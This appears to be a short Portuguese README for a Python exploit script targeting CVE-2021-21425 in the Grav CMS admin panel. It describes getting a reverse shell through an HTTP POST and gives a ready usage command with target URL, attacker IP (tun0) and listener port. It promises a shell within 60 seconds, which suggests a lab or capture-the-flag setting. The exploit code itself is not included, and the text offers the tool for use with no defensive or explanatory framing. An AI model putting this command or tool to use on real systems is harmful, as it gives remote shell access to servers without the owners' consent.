
Script de exploit em Python para CVE-2021-21425 visando o painel administrativo do Grav CMS, entregando um reverse shell via requisição HTTP POST com LHOST e LPORT configuráveis.
esta é a minha versão, encontrei muitas na internet, mas essas são muito ruins
python3 exploit.py -u http://[IP]/grav-admin/ --lhost [YOUR TUN0 IP] --lport 4444
aguarde.. por 60 segundos você obterá um shell no seu listener